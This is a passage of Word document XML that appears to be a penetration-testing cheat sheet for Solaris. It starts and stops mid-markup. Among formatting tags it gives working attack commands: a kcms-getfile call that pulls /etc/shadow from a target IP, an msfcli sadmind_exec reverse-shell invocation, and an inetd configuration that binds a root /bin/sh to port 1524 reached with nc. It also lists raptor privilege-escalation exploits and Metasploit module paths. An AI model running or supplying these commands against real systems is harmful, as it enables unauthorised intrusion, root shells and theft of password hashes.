          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>kcms</w:t>
      </w:r>
      <w:r w:rsidR="00720CDE" w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>-getfile –h &lt;IP&gt; -f /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRDefault="00720CDE" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRPr="00720CDE" w:rsidRDefault="00720CDE" w:rsidP="00720CDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sadmind default security level</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35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> solaris/</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sunrpc/sadmind_exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD=cmd/unix/reverse RHOST=&lt;IP&gt; E</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r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>admind_exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.sh &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35552" w:rsidRPr="001D1305" w:rsidRDefault="00F35552" w:rsidP="00720CDE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRPr="0042324E" w:rsidRDefault="0042324E" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Priv Esc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRPr="001D1305" w:rsidRDefault="00720CDE" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CDE libDtHelp library buffer overflow vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="003E682B" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00584701" w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aptor_libdthelp.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="003E682B" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00584701" w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aptor_libdthelp2.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack-based buffer overflow in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>circ(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) function of passwd(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A730B1" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_password.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRPr="001D1305" w:rsidRDefault="00FA5FCD" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_ldpreload.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRPr="001D1305" w:rsidRDefault="008B5C6C" w:rsidP="00584701"/>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System V login Buffer overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_rlogin.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701"/>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701"/>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:r w:rsidRPr="001D1305">
        <w:t xml:space="preserve">Buffer overflow in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1305">
        <w:t>Strcmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1305">
        <w:t>) function of X11 XKEYBOARD extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:r w:rsidRPr="001D1305">
        <w:t>raptor_xkb.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRDefault="00584701" w:rsidP="00584701"/>
    <w:p w:rsidR="00CB2BC2" w:rsidRDefault="00CB2BC2" w:rsidP="00584701"/>
    <w:p w:rsidR="00CB2BC2" w:rsidRPr="001D1305" w:rsidRDefault="00CB2BC2" w:rsidP="00584701"/>
    <w:p w:rsidR="00584701" w:rsidRPr="001D1305" w:rsidRDefault="00584701" w:rsidP="00584701">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1305">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Under solaris you can run inetd as a non priv user so can create a bind shell on a port e.g. </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2324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "ingreslock  stream  tcp     nowait  root /bin/sh sh -i " &gt; /tmp/my.conf</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r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/usr/sbin/inetd -s /tmp/my.conf</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r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Then to connect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> your bind shell do: </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2324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0042324E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;IP&gt; 1524</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRDefault="00584701"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
    <w:p w:rsidR="008B5C6C" w:rsidRPr="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris 10:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRDefault="00584701"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r w:rsidRPr="008B5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel memory leak via </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sysinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>raptor_sysinfo.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="008B5C6C">
      <w:r w:rsidRPr="00584701">
        <w:t xml:space="preserve">Buffer overflow in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00584701">
        <w:t>Strcmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00584701">
        <w:t>) function of X11 XKEYBOARD extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="008B5C6C">
      <w:r>
        <w:t>raptor_xkb.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1305" w:rsidRDefault="001D1305"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r w:rsidRPr="008B5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NSPR library arbitrary file creation vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_libnspr.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="008B5C6C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_libnspr2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C" w:rsidP="008B5C6C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raptor_libnspr.3txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C"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roofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> froot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRPr="00D25D85" w:rsidRDefault="008B5C6C" w:rsidP="008B5C6C">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exploit/solaris/telnet/fuser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008B5C6C" w:rsidRDefault="008B5C6C"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
    <w:p w:rsidR="00D25D85" w:rsidRDefault="00D25D85" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25D85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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exploit/solaris/sunrpc/ypupdated_exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsid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exploit/solaris/samba/lsa_transnames_heap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25D85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </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exploit/solaris/telnet/fuser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsid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exploit/solaris/samba/trans2open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25D85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             </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exploit/solaris/telnet/ttyprompt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="009D6D8E"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exploit/solaris/sunrpc/sadmind_adm_build_path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25D85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C019A" w:rsidRDefault="009C019A" w:rsidP="00D25D85">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C019A" w:rsidRDefault="009C019A" w:rsidP="00D25D85">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C019A" w:rsidRPr="009C019A" w:rsidRDefault="009C019A" w:rsidP="009C019A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris/x86:</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raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.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raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
